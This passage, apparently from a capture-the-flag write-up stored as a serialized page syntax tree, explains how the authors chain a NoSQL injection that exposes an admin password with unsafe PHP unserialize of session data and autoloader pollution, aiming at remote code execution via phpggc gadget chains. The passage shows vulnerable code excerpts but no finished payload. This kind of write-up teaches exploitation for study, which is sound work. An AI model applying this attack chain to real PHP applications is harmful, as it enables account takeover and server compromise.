WHERE",{"type":33,"tag":128,"props":41297,"children":41298},{"style":1576},[41299],{"type":38,"value":35722},{"type":33,"tag":128,"props":41301,"children":41302},{"style":300},[41303],{"type":38,"value":5657},{"type":33,"tag":128,"props":41305,"children":41306},{"style":1576},[41307],{"type":38,"value":41308}," null\n",{"type":33,"tag":128,"props":41310,"children":41311},{"class":130,"line":839},[41312],{"type":33,"tag":128,"props":41313,"children":41314},{"style":323},[41315],{"type":38,"value":5815},{"type":33,"tag":47,"props":41317,"children":41318},{},[41319],{"type":38,"value":41320},"This allows us to retrieve the administrator's password.",{"type":33,"tag":32400,"props":41322,"children":41324},{"width":40587,"src":41323},"https://user-images.githubusercontent.com/28403617/227583798-02661604-c9b8-4e10-a47a-841e6d3e6b38.png",[],{"type":33,"tag":40,"props":41326,"children":41328},{"id":41327},"second-nosqli",[41329],{"type":38,"value":41330},"Second NoSQLI",{"type":33,"tag":47,"props":41332,"children":41333},{},[41334],{"type":38,"value":41335},"By analyzing the code, we quickly realize that a request also don't have protection.",{"type":33,"tag":114,"props":41337,"children":41338},{"lang":40629},[41339],{"type":33,"tag":119,"props":41340,"children":41342},{"code":41341,"language":40629,"meta":8,"className":40634,"style":8},"public function updateUser($data)\n{\n return $this->database->update('users', $data['_id'], $data);\n}\n",[41343],{"type":33,"tag":105,"props":41344,"children":41345},{"__ignoreMap":8},[41346,41374,41381,41473],{"type":33,"tag":128,"props":41347,"children":41348},{"class":130,"line":131},[41349,41353,41357,41362,41366,41370],{"type":33,"tag":128,"props":41350,"children":41351},{"style":300},[41352],{"type":38,"value":25953},{"type":33,"tag":128,"props":41354,"children":41355},{"style":300},[41356],{"type":38,"value":15428},{"type":33,"tag":128,"props":41358,"children":41359},{"style":135},[41360],{"type":38,"value":41361}," updateUser",{"type":33,"tag":128,"props":41363,"children":41364},{"style":312},[41365],{"type":38,"value":40659},{"type":33,"tag":128,"props":41367,"children":41368},{"style":306},[41369],{"type":38,"value":2815},{"type":33,"tag":128,"props":41371,"children":41372},{"style":312},[41373],{"type":38,"value":2427},{"type":33,"tag":128,"props":41375,"children":41376},{"class":130,"line":362},[41377],{"type":33,"tag":128,"props":41378,"children":41379},{"style":312},[41380],{"type":38,"value":650},{"type":33,"tag":128,"props":41382,"children":41383},{"class":130,"line":403},[41384,41388,41392,41396,41400,41404,41408,41412,41416,41420,41424,41428,41432,41436,41440,41444,41448,41453,41457,41461,41465,41469],{"type":33,"tag":128,"props":41385,"children":41386},{"style":1576},[41387],{"type":38,"value":13056},{"type":33,"tag":128,"props":41389,"children":41390},{"style":312},[41391],{"type":38,"value":40686},{"type":33,"tag":128,"props":41393,"children":41394},{"style":151},[41395],{"type":38,"value":3721},{"type":33,"tag":128,"props":41397,"children":41398},{"style":300},[41399],{"type":38,"value":40695},{"type":33,"tag":128,"props":41401,"children":41402},{"style":306},[41403],{"type":38,"value":40700},{"type":33,"tag":128,"props":41405,"children":41406},{"style":300},[41407],{"type":38,"value":40695},{"type":33,"tag":128,"props":41409,"children":41410},{"style":135},[41411],{"type":38,"value":30219},{"type":33,"tag":128,"props":41413,"children":41414},{"style":312},[41415],{"type":38,"value":5566},{"type":33,"tag":128,"props":41417,"children":41418},{"style":676},[41419],{"type":38,"value":6040},{"type":33,"tag":128,"props":41421,"children":41422},{"style":140},[41423],{"type":38,"value":30376},{"type":33,"tag":128,"props":41425,"children":41426},{"style":676},[41427],{"type":38,"value":6040},{"type":33,"tag":128,"props":41429,"children":41430},{"style":312},[41431],{"type":38,"value":5584},{"type":33,"tag":128,"props":41433,"children":41434},{"style":312},[41435],{"type":38,"value":40686},{"type":33,"tag":128,"props":41437,"children":41438},{"style":306},[41439],{"type":38,"value":2815},{"type":33,"tag":128,"props":41441,"children":41442},{"style":312},[41443],{"type":38,"value":344},{"type":33,"tag":128,"props":41445,"children":41446},{"style":676},[41447],{"type":38,"value":6040},{"type":33,"tag":128,"props":41449,"children":41450},{"style":140},[41451],{"type":38,"value":41452},"_id",{"type":33,"tag":128,"props":41454,"children":41455},{"style":676},[41456],{"type":38,"value":6040},{"type":33,"tag":128,"props":41458,"children":41459},{"style":312},[41460],{"type":38,"value":13540},{"type":33,"tag":128,"props":41462,"children":41463},{"style":312},[41464],{"type":38,"value":40686},{"type":33,"tag":128,"props":41466,"children":41467},{"style":306},[41468],{"type":38,"value":2815},{"type":33,"tag":128,"props":41470,"children":41471},{"style":312},[41472],{"type":38,"value":5815},{"type":33,"tag":128,"props":41474,"children":41475},{"class":130,"line":739},[41476],{"type":33,"tag":128,"props":41477,"children":41478},{"style":312},[41479],{"type":38,"value":854},{"type":33,"tag":47,"props":41481,"children":41482},{},[41483],{"type":38,"value":41484},"In this function we control the data parameter. Therefore, we can see that it is possible to update an entire user, including their access element.\nThis access element is a serialized array, so it is obvious that at some point in the application this element will be deserialized.",{"type":33,"tag":47,"props":41486,"children":41487},{},[41488],{"type":38,"value":41489},"A user in database have this structure:",{"type":33,"tag":114,"props":41491,"children":41492},{"lang":633},[41493],{"type":33,"tag":119,"props":41494,"children":41496},{"code":41495,"language":633,"meta":8,"className":637,"style":8},"{\n \"_id\": 1,\n \"username\": \"admin\",\n \"password\": \"[REDACTED]\",\n \"access\": \"a:4:{s:9:\\\"Dashboard\\\";b:1;s:7:\\\"Product\\\";b:1;s:5:\\\"Order\\\";b:1;s:4:\\\"User\\\";b:1;}\"\n}\n",[41497],{"type":33,"tag":105,"props":41498,"children":41499},{"__ignoreMap":8},[41500,41507,41534,41570,41606,41711],{"type":33,"tag":128,"props":41501,"children":41502},{"class":130,"line":131},[41503],{"type":33,"tag":128,"props":41504,"children":41505},{"style":312},[41506],{"type":38,"value":650},{"type":33,"tag":128,"props":41508,"children":41509},{"class":130,"line":362},[41510,41514,41518,41522,41526,41530],{"type":33,"tag":128,"props":41511,"children":41512},{"style":656},[41513],{"type":38,"value":771},{"type":33,"tag":128,"props":41515,"children":41516},{"style":437},[41517],{"type":38,"value":41452},{"type":33,"tag":128,"props":41519,"children":41520},{"style":656},[41521],{"type":38,"value":669},{"type":33,"tag":128,"props":41523,"children":41524},{"style":312},[41525],{"type":38,"value":284},{"type":33,"tag":128,"props":41527,"children":41528},{"style":523},[41529],{"type":38,"value":9774},{"type":33,"tag":128,"props":41531,"children":41532},{"style":312},[41533],{"type":38,"value":693},{"type":33,"tag":128,"props":41535,"children":41536},{"class":130,"line":403},[41537,41541,41545,41549,41553,41557,41562,41566],{"type":33,"tag":128,"props":41538,"children":41539},{"style":656},[41540],{"type":38,"value":771},{"type":33,"tag":128,"props":41542,"children":41543},{"style":437},[41544],{"type":38,"value":29798},{"type":33,"tag":128,"props":41546,"children":41547},{"style":656},[41548],{"type":38,"value":669},{"type":33,"tag":128,"props":41550,"children":41551},{"style":312},[41552],{"type":38,"value":284},{"type":33,"tag":128,"props":41554,"children":41555},{"style":676},[41556],{"type":38,"value":679},{"type":33,"tag":128,"props":41558,"children":41559},{"style":140},[41560],{"type":38,"value":41561},"admin",{"type":33,"tag":128,"props":41563,"children":41564},{"style":676},[41565],{"type":38,"value":669},{"type":33,"tag":128,"props":41567,"children":41568},{"style":312},[41569],{"type":38,"value":693},{"type":33,"tag":128,"props":41571,"children":41572},{"class":130,"line":739},[41573,41577,41582,41586,41590,41594,41598,41602],{"type":33,"tag":128,"props":41574,"children":41575},{"style":656},[41576],{"type":38,"value":771},{"type":33,"tag":128,"props":41578,"children":41579},{"style":437},[41580],{"type":38,"value":41581},"password",{"type":33,"tag":128,"props":41583,"children":41584},{"style":656},[41585],{"type":38,"value":669},{"type":33,"tag":128,"props":41587,"children":41588},{"style":312},[41589],{"type":38,"value":284},{"type":33,"tag":128,"props":41591,"children":41592},{"style":676},[41593],{"type":38,"value":679},{"type":33,"tag":128,"props":41595,"children":41596},{"style":140},[41597],{"type":38,"value":9628},{"type":33,"tag":128,"props":41599,"children":41600},{"style":676},[41601],{"type":38,"value":669},{"type":33,"tag":128,"props":41603,"children":41604},{"style":312},[41605],{"type":38,"value":693},{"type":33,"tag":128,"props":41607,"children":41608},{"class":130,"line":765},[41609,41613,41618,41622,41626,41630,41635,41639,41644,41648,41653,41657,41662,41666,41671,41675,41680,41684,41689,41693,41698,41702,41707],{"type":33,"tag":128,"props":41610,"children":41611},{"style":656},[41612],{"type":38,"value":771},{"type":33,"tag":128,"props":41614,"children":41615},{"style":437},[41616],{"type":38,"value":41617},"access",{"type":33,"tag":128,"props":41619,"children":41620},{"style":656},[41621],{"type":38,"value":669},{"type":33,"tag":128,"props":41623,"children":41624},{"style":312},[41625],{"type":38,"value":284},{"type":33,"tag":128,"props":41627,"children":41628},{"style":676},[41629],{"type":38,"value":679},{"type":33,"tag":128,"props":41631,"children":41632},{"style":140},[41633],{"type":38,"value":41634},"a:4:{s:9:",{"type":33,"tag":128,"props":41636,"children":41637},{"style":151},[41638],{"type":38,"value":10544},{"type":33,"tag":128,"props":41640,"children":41641},{"style":140},[41642],{"type":38,"value":41643},"Dashboard",{"type":33,"tag":128,"props":41645,"children":41646},{"style":151},[41647],{"type":38,"value":10544},{"type":33,"tag":128,"props":41649,"children":41650},{"style":140},[41651],{"type":38,"value":41652},";b:1;s:7:",{"type":33,"tag":128,"props":41654,"children":41655},{"style":151},[41656],{"type":38,"value":10544},{"type":33,"tag":128,"props":41658,"children":41659},{"style":140},[41660],{"type":38,"value":41661},"Product",{"type":33,"tag":128,"props":41663,"children":41664},{"style":151},[41665],{"type":38,"value":10544},{"type":33,"tag":128,"props":41667,"children":41668},{"style":140},[41669],{"type":38,"value":41670},";b:1;s:5:",{"type":33,"tag":128,"props":41672,"children":41673},{"style":151},[41674],{"type":38,"value":10544},{"type":33,"tag":128,"props":41676,"children":41677},{"style":140},[41678],{"type":38,"value":41679},"Order",{"type":33,"tag":128,"props":41681,"children":41682},{"style":151},[41683],{"type":38,"value":10544},{"type":33,"tag":128,"props":41685,"children":41686},{"style":140},[41687],{"type":38,"value":41688},";b:1;s:4:",{"type":33,"tag":128,"props":41690,"children":41691},{"style":151},[41692],{"type":38,"value":10544},{"type":33,"tag":128,"props":41694,"children":41695},{"style":140},[41696],{"type":38,"value":41697},"User",{"type":33,"tag":128,"props":41699,"children":41700},{"style":151},[41701],{"type":38,"value":10544},{"type":33,"tag":128,"props":41703,"children":41704},{"style":140},[41705],{"type":38,"value":41706},";b:1;}",{"type":33,"tag":128,"props":41708,"children":41709},{"style":676},[41710],{"type":38,"value":836},{"type":33,"tag":128,"props":41712,"children":41713},{"class":130,"line":804},[41714],{"type":33,"tag":128,"props":41715,"children":41716},{"style":312},[41717],{"type":38,"value":854},{"type":33,"tag":47,"props":41719,"children":41720},{},[41721],{"type":38,"value":41722},"The access element is used to determine the user's access rights, on the back office.",{"type":33,"tag":47,"props":41724,"children":41725},{},[41726],{"type":38,"value":41727},"We can see that deserialization is not protected and is therefore susceptible to be exploited.",{"type":33,"tag":114,"props":41729,"children":41730},{"lang":40629},[41731],{"type":33,"tag":119,"props":41732,"children":41734},{"code":41733,"language":40629,"meta":8,"className":40634,"style":8},"\u003C?php\nclass UserModel extends Model\n{\n public function __construct()\n {\n parent::__construct();\n $this->username = $_SESSION['username'] ?? '';\n $this->email = $_SESSION['email'] ?? '';\n $this->access = unserialize($_SESSION['access'] ?? ''); // This line is vulnerable\n }\n ...\n",[41735],{"type":33,"tag":105,"props":41736,"children":41737},{"__ignoreMap":8},[41738,41751,41773,41780,41801,41808,41825,41891,41955,42029,42036],{"type":33,"tag":128,"props":41739,"children":41740},{"class":130,"line":131},[41741,41746],{"type":33,"tag":128,"props":41742,"children":41743},{"style":300},[41744],{"type":38,"value":41745},"\u003C?",{"type":33,"tag":128,"props":41747,"children":41748},{"style":151},[41749],{"type":38,"value":41750},"php\n",{"type":33,"tag":128,"props":41752,"children":41753},{"class":130,"line":362},[41754,41758,41763,41768],{"type":33,"tag":128,"props":41755,"children":41756},{"style":300},[41757],{"type":38,"value":30336},{"type":33,"tag":128,"props":41759,"children":41760},{"style":30339},[41761],{"type":38,"value":41762}," UserModel",{"type":33,"tag":128,"props":41764,"children":41765},{"style":300},[41766],{"type":38,"value":41767}," extends",{"type":33,"tag":128,"props":41769,"children":41770},{"style":135},[41771],{"type":38,"value":41772}," Model\n",{"type":33,"tag":128,"props":41774,"children":41775},{"class":130,"line":403},[41776],{"type":33,"tag":128,"props":41777,"children":41778},{"style":312},[41779],{"type":38,"value":650},{"type":33,"tag":128,"props":41781,"children":41782},{"class":130,"line":739},[41783,41788,41792,41797],{"type":33,"tag":128,"props":41784,"children":41785},{"style":300},[41786],{"type":38,"value":41787}," public",{"type":33,"tag":128,"props":41789,"children":41790},{"style":300},[41791],{"type":38,"value":15428},{"type":33,"tag":128,"props":41793,"children":41794},{"style":437},[41795],{"type":38,"value":41796}," __construct",{"type":33,"tag":128,"props":41798,"children":41799},{"style":312},[41800],{"type":38,"value":7857},{"type":33,"tag":128,"props":41802,"children":41803},{"class":130,"line":765},[41804],{"type":33,"tag":128,"props":41805,"children":41806},{"style":312},[41807],{"type":38,"value":40795},{"type":33,"tag":128,"props":41809,"children":41810},{"class":130,"line":804},[41811,41816,41821],{"type":33,"tag":128,"props":41812,"children":41813},{"style":300},[41814],{"type":38,"value":41815}," parent::",{"type":33,"tag":128,"props":41817,"children":41818},{"style":135},[41819],{"type":38,"value":41820},"__construct",{"type":33,"tag":128,"props":41822,"children":41823},{"style":312},[41824],{"type":38,"value":15496},{"type":33,"tag":128,"props":41826,"children":41827},{"class":130,"line":839},[41828,41833,41837,41841,41845,41849,41853,41858,41862,41866,41870,41874,41878,41882,41887],{"type":33,"tag":128,"props":41829,"children":41830},{"style":312},[41831],{"type":38,"value":41832}," $",{"type":33,"tag":128,"props":41834,"children":41835},{"style":151},[41836],{"type":38,"value":3721},{"type":33,"tag":128,"props":41838,"children":41839},{"style":300},[41840],{"type":38,"value":40695},{"type":33,"tag":128,"props":41842,"children":41843},{"style":306},[41844],{"type":38,"value":29798},{"type":33,"tag":128,"props":41846,"children":41847},{"style":312},[41848],{"type":38,"value":5657},{"type":33,"tag":128,"props":41850,"children":41851},{"style":312},[41852],{"type":38,"value":40686},{"type":33,"tag":128,"props":41854,"children":41855},{"style":306},[41856],{"type":38,"value":41857},"_SESSION",{"type":33,"tag":128,"props":41859,"children":41860},{"style":312},[41861],{"type":38,"value":344},{"type":33,"tag":128,"props":41863,"children":41864},{"style":676},[41865],{"type":38,"value":6040},{"type":33,"tag":128,"props":41867,"children":41868},{"style":140},[41869],{"type":38,"value":29798},{"type":33,"tag":128,"props":41871,"children":41872},{"style":676},[41873],{"type":38,"value":6040},{"type":33,"tag":128,"props":41875,"children":41876},{"style":312},[41877],{"type":38,"value":354},{"type":33,"tag":128,"props":41879,"children":41880},{"style":300},[41881],{"type":38,"value":13931},{"type":33,"tag":128,"props":41883,"children":41884},{"style":676},[41885],{"type":38,"value":41886}," ''",{"type":33,"tag":128,"props":41888,"children":41889},{"style":312},[41890],{"type":38,"value":5676},{"type":33,"tag":128,"props":41892,"children":41893},{"class":130,"line":848},[41894,41898,41902,41906,41910,41915,41919,41923,41927,41931,41935,41939,41943,41947,41951],{"type":33,"tag":128,"props":41895,"children":41896},{"style":312},[41897],{"type":38,"value":41832},{"type":33,"tag":128,"props":41899,"children":41900},{"style":151},[41901],{"type":38,"value":3721},{"type":33,"tag":128,"props":41903,"children":41904},{"style":300},[41905],{"type":38,"value":40695},{"type":33,"tag":128,"props":41907,"children":41908},{"style":306},[41909],{"type":38,"value":29866},{"type":33,"tag":128,"props":41911,"children":41912},{"style":312},[41913],{"type":38,"value":41914}," =",{"type":33,"tag":128,"props":41916,"children":41917},{"style":312},[41918],{"type":38,"value":40686},{"type":33,"tag":128,"props":41920,"children":41921},{"style":306},[41922],{"type":38,"value":41857},{"type":33,"tag":128,"props":41924,"children":41925},{"style":312},[41926],{"type":38,"value":344},{"type":33,"tag":128,"props":41928,"children":41929},{"style":676},[41930],{"type":38,"value":6040},{"type":33,"tag":128,"props":41932,"children":41933},{"style":140},[41934],{"type":38,"value":29866},{"type":33,"tag":128,"props":41936,"children":41937},{"style":676},[41938],{"type":38,"value":6040},{"type":33,"tag":128,"props":41940,"children":41941},{"style":312},[41942],{"type":38,"value":354},{"type":33,"tag":128,"props":41944,"children":41945},{"style":300},[41946],{"type":38,"value":13931},{"type":33,"tag":128,"props":41948,"children":41949},{"style":676},[41950],{"type":38,"value":41886},{"type":33,"tag":128,"props":41952,"children":41953},{"style":312},[41954],{"type":38,"value":5676},{"type":33,"tag":128,"props":41956,"children":41957},{"class":130,"line":976},[41958,41962,41966,41970,41974,41979,41984,41988,41992,41996,42000,42004,42008,42012,42016,42020,42024],{"type":33,"tag":128,"props":41959,"children":41960},{"style":312},[41961],{"type":38,"value":41832},{"type":33,"tag":128,"props":41963,"children":41964},{"style":151},[41965],{"type":38,"value":3721},{"type":33,"tag":128,"props":41967,"children":41968},{"style":300},[41969],{"type":38,"value":40695},{"type":33,"tag":128,"props":41971,"children":41972},{"style":306},[41973],{"type":38,"value":41617},{"type":33,"tag":128,"props":41975,"children":41976},{"style":312},[41977],{"type":38,"value":41978}," =",{"type":33,"tag":128,"props":41980,"children":41981},{"style":437},[41982],{"type":38,"value":41983}," unserialize",{"type":33,"tag":128,"props":41985,"children":41986},{"style":312},[41987],{"type":38,"value":40659},{"type":33,"tag":128,"props":41989,"children":41990},{"style":306},[41991],{"type":38,"value":41857},{"type":33,"tag":128,"props":41993,"children":41994},{"style":312},[41995],{"type":38,"value":344},{"type":33,"tag":128,"props":41997,"children":41998},{"style":676},[41999],{"type":38,"value":6040},{"type":33,"tag":128,"props":42001,"children":42002},{"style":140},[42003],{"type":38,"value":41617},{"type":33,"tag":128,"props":42005,"children":42006},{"style":676},[42007],{"type":38,"value":6040},{"type":33,"tag":128,"props":42009,"children":42010},{"style":312},[42011],{"type":38,"value":354},{"type":33,"tag":128,"props":42013,"children":42014},{"style":300},[42015],{"type":38,"value":13931},{"type":33,"tag":128,"props":42017,"children":42018},{"style":676},[42019],{"type":38,"value":41886},{"type":33,"tag":128,"props":42021,"children":42022},{"style":312},[42023],{"type":38,"value":27256},{"type":33,"tag":128,"props":42025,"children":42026},{"style":5541},[42027],{"type":38,"value":42028}," // This line is vulnerable\n",{"type":33,"tag":128,"props":42030,"children":42031},{"class":130,"line":988},[42032],{"type":33,"tag":128,"props":42033,"children":42034},{"style":312},[42035],{"type":38,"value":845},{"type":33,"tag":128,"props":42037,"children":42038},{"class":130,"line":1001},[42039],{"type":33,"tag":128,"props":42040,"children":42041},{"style":312},[42042],{"type":38,"value":42043}," ...\n",{"type":33,"tag":47,"props":42045,"children":42046},{},[42047],{"type":33,"tag":2302,"props":42048,"children":42049},{},[42050],{"type":38,"value":42051},"What is serialization?",{"type":33,"tag":47,"props":42053,"children":42054},{},[42055],{"type":38,"value":42056},"In PHP, serialization is the process of converting a PHP object or data structure into a format that can be easily stored or transmitted. The serialized data can be stored in a file, database, or sent over a network. The serialized data can then be later retrieved and unserialized, which is the process of converting the serialized data back into its original PHP object or data structure.",{"type":33,"tag":47,"props":42058,"children":42059},{},[42060],{"type":38,"value":42061},"Example:",{"type":33,"tag":114,"props":42063,"children":42064},{"lang":40629},[42065],{"type":33,"tag":119,"props":42066,"children":42068},{"code":42067,"language":40629,"meta":8,"className":40634,"style":8},"$data = array('name' => 'John',\n 'age' => 30,\n 'email' => 'john@example.com');\n$serialized_data = serialize($data);\n\necho $serialized_data;\n'a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}'\n",[42069],{"type":33,"tag":105,"props":42070,"children":42071},{"__ignoreMap":8},[42072,42128,42157,42193,42226,42233,42252],{"type":33,"tag":128,"props":42073,"children":42074},{"class":130,"line":131},[42075,42079,42083,42087,42092,42096,42100,42104,42108,42112,42116,42120,42124],{"type":33,"tag":128,"props":42076,"children":42077},{"style":312},[42078],{"type":38,"value":3651},{"type":33,"tag":128,"props":42080,"children":42081},{"style":306},[42082],{"type":38,"value":2815},{"type":33,"tag":128,"props":42084,"children":42085},{"style":312},[42086],{"type":38,"value":5657},{"type":33,"tag":128,"props":42088,"children":42089},{"style":437},[42090],{"type":38,"value":42091}," array",{"type":33,"tag":128,"props":42093,"children":42094},{"style":312},[42095],{"type":38,"value":5566},{"type":33,"tag":128,"props":42097,"children":42098},{"style":676},[42099],{"type":38,"value":6040},{"type":33,"tag":128,"props":42101,"children":42102},{"style":140},[42103],{"type":38,"value":12126},{"type":33,"tag":128,"props":42105,"children":42106},{"style":676},[42107],{"type":38,"value":6040},{"type":33,"tag":128,"props":42109,"children":42110},{"style":300},[42111],{"type":38,"value":5625},{"type":33,"tag":128,"props":42113,"children":42114},{"style":676},[42115],{"type":38,"value":6739},{"type":33,"tag":128,"props":42117,"children":42118},{"style":140},[42119],{"type":38,"value":38051},{"type":33,"tag":128,"props":42121,"children":42122},{"style":676},[42123],{"type":38,"value":6040},{"type":33,"tag":128,"props":42125,"children":42126},{"style":312},[42127],{"type":38,"value":693},{"type":33,"tag":128,"props":42129,"children":42130},{"class":130,"line":362},[42131,42136,42141,42145,42149,42153],{"type":33,"tag":128,"props":42132,"children":42133},{"style":676},[42134],{"type":38,"value":42135}," '",{"type":33,"tag":128,"props":42137,"children":42138},{"style":140},[42139],{"type":38,"value":42140},"age",{"type":33,"tag":128,"props":42142,"children":42143},{"style":676},[42144],{"type":38,"value":6040},{"type":33,"tag":128,"props":42146,"children":42147},{"style":300},[42148],{"type":38,"value":5625},{"type":33,"tag":128,"props":42150,"children":42151},{"style":523},[42152],{"type":38,"value":38072},{"type":33,"tag":128,"props":42154,"children":42155},{"style":312},[42156],{"type":38,"value":693},{"type":33,"tag":128,"props":42158,"children":42159},{"class":130,"line":403},[42160,42164,42168,42172,42176,42180,42185,42189],{"type":33,"tag":128,"props":42161,"children":42162},{"style":676},[42163],{"type":38,"value":42135},{"type":33,"tag":128,"props":42165,"children":42166},{"style":140},[42167],{"type":38,"value":29866},{"type":33,"tag":128,"props":42169,"children":42170},{"style":676},[42171],{"type":38,"value":6040},{"type":33,"tag":128,"props":42173,"children":42174},{"style":300},[42175],{"type":38,"value":5625},{"type":33,"tag":128,"props":42177,"children":42178},{"style":676},[42179],{"type":38,"value":6739},{"type":33,"tag":128,"props":42181,"children":42182},{"style":140},[42183],{"type":38,"value":42184},"john@example.com",{"type":33,"tag":128,"props":42186,"children":42187},{"style":676},[42188],{"type":38,"value":6040},{"type":33,"tag":128,"props":42190,"children":42191},{"style":312},[42192],{"type":38,"value":5815},{"type":33,"tag":128,"props":42194,"children":42195},{"class":130,"line":739},[42196,42200,42205,42209,42214,42218,42222],{"type":33,"tag":128,"props":42197,"children":42198},{"style":312},[42199],{"type":38,"value":3651},{"type":33,"tag":128,"props":42201,"children":42202},{"style":306},[42203],{"type":38,"value":42204},"serialized_data",{"type":33,"tag":128,"props":42206,"children":42207},{"style":312},[42208],{"type":38,"value":5657},{"type":33,"tag":128,"props":42210,"children":42211},{"style":437},[42212],{"type":38,"value":42213}," serialize",{"type":33,"tag":128,"props":42215,"children":42216},{"style":312},[42217],{"type":38,"value":40659},{"type":33,"tag":128,"props":42219,"children":42220},{"style":306},[42221],{"type":38,"value":2815},{"type":33,"tag":128,"props":42223,"children":42224},{"style":312},[42225],{"type":38,"value":5815},{"type":33,"tag":128,"props":42227,"children":42228},{"class":130,"line":765},[42229],{"type":33,"tag":128,"props":42230,"children":42231},{"emptyLinePlaceholder":896},[42232],{"type":38,"value":899},{"type":33,"tag":128,"props":42234,"children":42235},{"class":130,"line":804},[42236,42240,42244,42248],{"type":33,"tag":128,"props":42237,"children":42238},{"style":437},[42239],{"type":38,"value":8671},{"type":33,"tag":128,"props":42241,"children":42242},{"style":312},[42243],{"type":38,"value":40686},{"type":33,"tag":128,"props":42245,"children":42246},{"style":306},[42247],{"type":38,"value":42204},{"type":33,"tag":128,"props":42249,"children":42250},{"style":312},[42251],{"type":38,"value":5676},{"type":33,"tag":128,"props":42253,"children":42254},{"class":130,"line":839},[42255,42259,42264],{"type":33,"tag":128,"props":42256,"children":42257},{"style":676},[42258],{"type":38,"value":6040},{"type":33,"tag":128,"props":42260,"children":42261},{"style":140},[42262],{"type":38,"value":42263},"a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}",{"type":33,"tag":128,"props":42265,"children":42266},{"style":676},[42267],{"type":38,"value":10313},{"type":33,"tag":47,"props":42269,"children":42270},{},[42271,42273],{"type":38,"value":42272},"If malicious users can manipulate the serialized data, it can be used to inject malicious code into the unserialized data. This is known as a deserialization vulnerability and can be a serious security issue. The most famous repo to generate payloads for deserialization vulnerabilities is ",{"type":33,"tag":53,"props":42274,"children":42277},{"href":42275,"rel":42276},"https://github.com/ambionics/phpggc",[57],[42278],{"type":38,"value":42279},"phpggc (php generic gadget chains)",{"type":33,"tag":40,"props":42281,"children":42283},{"id":42282},"php-gadgets",[42284],{"type":38,"value":42285},"PHP Gadgets",{"type":33,"tag":47,"props":42287,"children":42288},{},[42289,42291,42297],{"type":38,"value":42290},"So we can then use the ",{"type":33,"tag":53,"props":42292,"children":42294},{"href":42275,"rel":42293},[57],[42295],{"type":38,"value":42296},"phpggc",{"type":38,"value":42298}," library which allows crafting payloads exploiting the deserialization vulnerability.\nphpggc is based on the exploitation of deserialization through known libraries such as Monolog, Guzzle, Symfony, Laravel, etc.",{"type":33,"tag":47,"props":42300,"children":42301},{},[42302,42304,42309],{"type":38,"value":42303},"However, we quickly realize that the interesting libraries (in our case ",{"type":33,"tag":2302,"props":42305,"children":42306},{},[42307],{"type":38,"value":42308},"Monolog",{"type":38,"value":42310},") are located in the frontend part, while our unserialization is performed in the backend part.\nTherefore, it is currently impossible for us to load the frontend libraries.",{"type":33,"tag":40,"props":42312,"children":42314},{"id":42313},"autoload",[42315],{"type":38,"value":42316},"Autoload",{"type":33,"tag":47,"props":42318,"children":42319},{},[42320,42322,42329],{"type":38,"value":42321},"For this part we based our work on ",{"type":33,"tag":53,"props":42323,"children":42326},{"href":42324,"rel":42325},"https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable",[57],[42327],{"type":38,"value":42328},"this article",{"type":38,"value":215},{"type":33,"tag":47,"props":42331,"children":42332},{},[42333],{"type":38,"value":42334},"With this deserialization, we can pollute the backend's autoloader to include the frontend's autoloader which will result in loading the required library to perform a RCE.",{"type":33,"tag":47,"props":42336,"children":42337},{},[42338],{"type":38,"value":42339},"Here is the reaction of my team when I said that on discord 😂",{"type":33,"tag":32400,"props":42341,"children":42343},{"width":40587,"src":42342},"https://user-images.githubusercontent.com/28403617/227541758-87dcc953-7467-445c-9ed0-1d6bc81ff7e4.png",[],{"type":33,"tag":47,"props":42345,"children":42346},{},[42347],{"type":33,"tag":2302,"props":42348,"children":42349},{},[42350],{"type":38,"value":42351},"What is the autoload function ?",{"type":33,"tag":47,"props":42353,"children":42354},{},[42355],{"type":38,"value":42356},"In PHP, \"Autoload\" refers to the automatic loading of PHP classes as needed, without having to manually include the class files. Once the Autoloader function has located the file, it includes it, and the class becomes available for use in the current script. The Autoload mechanism helps to reduce the amount of code you need to write, by automatically loading classes as needed, so you don't have to include them manually in every script. It also simplifies the task of managing dependencies between classes, by allowing you to organize your code into logical namespaces and directories.",{"type":33,"tag":47,"props":42358,"children":42359},{},[42360],{"type":38,"value":42361},"The idea is clear, for that we need to analyze the function passed as a parameter to the spl_autoload_register located in index.php file from backend folder.",{"type":33,"tag":47,"props":42363,"children":42364},{},[42365],{"type":38,"value":42366},"This function is a built-in function in PHP that allows you to register multiple functions (or methods) to be called when a class is not yet defined. So it's used for including local classes (not for classes from vendor folder).",{"type":33,"tag":114,"props":42368,"children":42369},{"land":40629},[42370],{"type":33,"tag":119,"props":42371,"children":42373},{"code":42372,"language":40629,"meta":8,"className":40634,"style":8},"spl_autoload_register(function ($name) {\n if (preg_match('/Controller$/', $name)) {\n $name = \"controllers/${name}\";\n } elseif (preg_match('/Model$/', $name)) {\n $name = \"models/${name}\";\n } elseif (preg_match('/_/', $name)) {\n $name = preg_replace('/_/', '/', $name);\n }\n\n $filename = \"/${name}.php\";\n\n if (file_exists($filename)) {\n require $filename;\n }\n elseif (file_exists(__DIR__ . $filename)) {\n require __DIR__ . $filename;\n }\n});\n",[42374],{"type":33,"tag":105,"props":42375,"children":42376},{"__ignoreMap":8},[42377,42410,42469,42514,42575,42619,42675,42743,42750,42757,42806,42813,42845,42865,42872,42918,42946,42953],{"type":33,"tag":128,"props":42378,"children":42379},{"class":130,"line":131},[42380,42385,42389,42393,42398,42402,42406],{"type":33,"tag":128,"props":42381,"children":42382},{"style":437},[42383],{"type":38,"value":42384},"spl_autoload_register",{"type":33,"tag":128,"props":42386,"children":42387},{"style":312},[42388],{"type":38,"value":5566},{"type":33,"tag":128,"props":42390,"children":42391},{"style":300},[42392],{"type":38,"value":13008},{"type":33,"tag":128,"props":42394,"children":42395},{"style":312},[42396],{"type":38,"value":42397}," 